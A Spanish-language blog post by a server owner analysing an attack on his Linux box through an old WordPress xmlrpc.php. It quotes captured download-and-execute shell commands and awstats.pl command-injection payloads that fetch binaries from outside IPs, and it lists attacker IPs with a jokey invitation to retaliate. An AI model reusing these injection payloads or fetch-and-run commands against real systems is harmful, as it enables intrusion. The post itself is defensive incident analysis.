Script kiddies de mierda

      Comments Off on Script kiddies de mierda

Los script kiddies analfabetos vuelven a la carga de nuevo.

Hace unos dias, de casualidad, vi un proceso extraño corriendo en mi linux pero lo elimine rapidamente por el acojone y no me acordaba del nombre ni los parametros, ahora me ha vuelto a aparecer (lo he vuelto a ver de casualidad), y estoy buscando info en internet para ver como pueden estar ejecutando un script en mi máquina y cual es el objetivo.
El proceso es este:

sh -c cd /tmp;wget 209.136.48.69/mirela;chmod +x mirela ./mirela

y desaparece solo al rato, supongo que cuando wget comprueba que no puede conectarse a esa dirección.

Me he puesto a investigar y lo primero que he visto en internet es que pueden estar intentando entrar por una vulnerabilidad del awstats. Lo ejecutan accediendo a awstats.pl de todas las formas posibles y, mira tu por donde, me he encontrado esto en el log del apache:

GET /cgi-bin/awstats/awstats.pl?configdir=
|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3b
chmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 314

Pero esa no es la puerta de entrada, nunca he instalado awstats y menos despues de leer lo que Bilo y Nano decian de esta vulnerabilidad y se ve que el apache devuelve un 404 de que no lo encuentra, sin embargo el script se estaba ejecutando así que tiene que haber entrado por otro lado.
Eso si, veo que todo el mundo intenta aprovecharse del awstats, porque hay otro intento distinto por aqui:

GET /awstats/awstats.pl?configdir=
|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3b
chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 304

Menos mal que ninguno da un código 200.

Sigo investigando y veo que el problema puede estar en el WordPress, el software de blogging que uso y que tiene una vulnerabilidad en el XML-RPC, pero no veo nada en el log que indique que el script se está ejecutando desde una llamada a un php del WordPress, ademas mi WordPress es el 1.5.1 y ya no tiene ese bug.

He seguido buscando en el log la palabra “mirela” para ver si se estaba llamando a algun php pasandole el script como parametro de la peticion GET, y no encontraba ninguna línea… ninguna hasta que he seguido investigando el log y, que hijos de puta…

82.100.0.62 - - [30/Dec/2005:20:25:00 +0100] "POST /xmlrpc.php HTTP/1.1" 404 298
82.100.0.62 - - [30/Dec/2005:20:25:01 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 303
82.100.0.62 - - [30/Dec/2005:20:25:02 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 310
82.100.0.62 - - [30/Dec/2005:20:25:04 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 311
82.100.0.62 - - [30/Dec/2005:20:25:05 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 305
82.100.0.62 - - [30/Dec/2005:20:25:06 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311
82.100.0.62 - - [30/Dec/2005:20:25:09 +0100] "POST /xmlrpc.php HTTP/1.1" 404 298
82.100.0.62 - - [30/Dec/2005:20:25:10 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 305
82.100.0.62 - - [30/Dec/2005:20:25:11 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 305
82.100.0.62 - - [30/Dec/2005:20:25:07 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12

hacen las peticiones por POST y por eso no se ven los parámetros, resulta que el único xmlrpc que encuentra es el último (200), y es una versión del wordpress obsoleta que tenía para pruebas, que si que tenía la vulnerabilidad del xmlrpc. Por supuesto ya la he borrado. Como se ve lo intentan con varios agujeros de varios programas y en varias ubicaciones.
Llevan haciendome este ataque desde el 4 de noviembre mas o menos, que casualidad, poco antes de que apareciera la noticia de la vulnerabilidad en el foro de WordPress… y digo yo, ¿no tendrán nada mas divertido que hacer o importante que aportar al mundo? ¿Se sentirán muy orgullosos de meter en un servidor de un tipo insignificante como yo un script que ni siquiera han escrito ellos mismos por que no tienen la suficiente capacidad intelectual?

Afortunadamente el script no ha conseguido ejecutarse correctamente gracias a que la carpeta tmp no tiene permisos abiertos (los cerré a raiz del último ataque que si me entraron hasta la cocina). Si se hubiese conseguido ejecutar tendría tmp lleno de ficheros como este tipo.
DE todos modos los script kiddies son bastante lerdos en general… porque este script estaba apuntando a una URL que ni siquiera respondía.

Aquí teneis una lista de las IPs de los listillos por si quereis putear a alguien y sabeis como… yo es que no se ni me interesa.

64.238.108.11 - - [04/Nov/2005:16:52:08 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
83.135.162.191 - - [05/Nov/2005:13:55:55 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
212.246.248.132 - - [05/Nov/2005:18:56:34 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
213.186.41.184 - - [09/Nov/2005:09:12:02 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
64.81.144.43 - - [10/Nov/2005:10:03:42 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
217.76.137.120 - - [13/Nov/2005:10:28:32 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
211.214.161.159 - - [14/Nov/2005:03:41:22 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
82.224.76.103 - - [14/Nov/2005:06:59:18 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
206.205.192.10 - - [15/Nov/2005:14:18:13 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
81.73.80.19 - - [18/Nov/2005:18:05:13 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
82.207.240.202 - - [20/Nov/2005:15:31:48 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
220.194.61.230 - - [21/Nov/2005:07:04:16 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
207.111.116.83 - - [25/Nov/2005:17:18:09 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
211.214.219.118 - - [26/Nov/2005:22:53:29 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
219.149.211.2 - - [01/Dec/2005:18:56:33 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
194.106.15.140 - - [03/Dec/2005:21:48:26 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
80.81.122.177 - - [04/Dec/2005:02:52:23 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
209.206.228.15 - - [11/Dec/2005:17:19:18 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
213.232.92.146 - - [12/Dec/2005:00:56:12 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
85.214.19.207 - - [17/Dec/2005:02:35:06 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
213.84.188.152 - - [17/Dec/2005:06:18:36 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
211.214.161.159 - - [17/Dec/2005:09:14:39 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
146.83.211.157 - - [17/Dec/2005:11:18:40 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
66.225.208.38 - - [17/Dec/2005:15:51:11 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
66.57.17.88 - - [18/Dec/2005:01:45:21 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
212.202.245.210 - - [19/Dec/2005:18:10:09 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
202.28.62.40 - - [20/Dec/2005:06:58:46 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
200.60.14.11 - - [20/Dec/2005:10:00:30 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
219.149.211.2 - - [20/Dec/2005:21:09:55 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
220.132.176.101 - - [21/Dec/2005:04:44:17 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
199.217.208.166 - - [21/Dec/2005:12:28:04 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
141.211.107.180 - - [21/Dec/2005:13:11:15 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
84.244.4.67 - - [21/Dec/2005:14:27:43 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
209.11.145.2 - - [21/Dec/2005:16:08:14 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
200.52.83.68 - - [21/Dec/2005:22:42:32 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
66.34.70.1 - - [22/Dec/2005:06:43:55 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
24.6.134.18 - - [22/Dec/2005:14:07:33 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
216.110.45.220 - - [22/Dec/2005:15:51:52 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
193.157.66.28 - - [22/Dec/2005:17:08:02 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
202.90.149.5 - - [23/Dec/2005:00:46:46 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
80.203.49.61 - - [23/Dec/2005:10:04:25 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
210.191.208.201 - - [23/Dec/2005:17:56:21 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
85.93.14.19 - - [24/Dec/2005:08:18:23 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
66.152.66.10 - - [24/Dec/2005:17:24:37 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
193.109.236.172 - - [24/Dec/2005:18:58:34 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
216.65.55.4 - - [24/Dec/2005:19:41:18 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
84.246.224.179 - - [25/Dec/2005:05:50:26 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
72.1.209.34 - - [25/Dec/2005:07:31:47 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
217.167.18.179 - - [25/Dec/2005:23:07:47 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
213.203.171.98 - - [26/Dec/2005:00:51:54 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
203.162.0.170 - - [26/Dec/2005:05:51:14 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
84.246.224.179 - - [26/Dec/2005:09:20:26 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
82.237.230.190 - - [26/Dec/2005:20:49:14 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
212.142.138.233 - - [29/Dec/2005:01:44:04 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
210.143.111.146 - - [29/Dec/2005:05:52:31 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
85.31.129.149 - - [29/Dec/2005:19:36:36 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12
82.100.0.62 - - [30/Dec/2005:20:25:07 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 12

Moraleja, para protegerte de este ataque, cuida tus permisos del directorio /tmp lo primero, si tienes awstats ponte la ultimisima version y si tienes WordPress, lo mismo.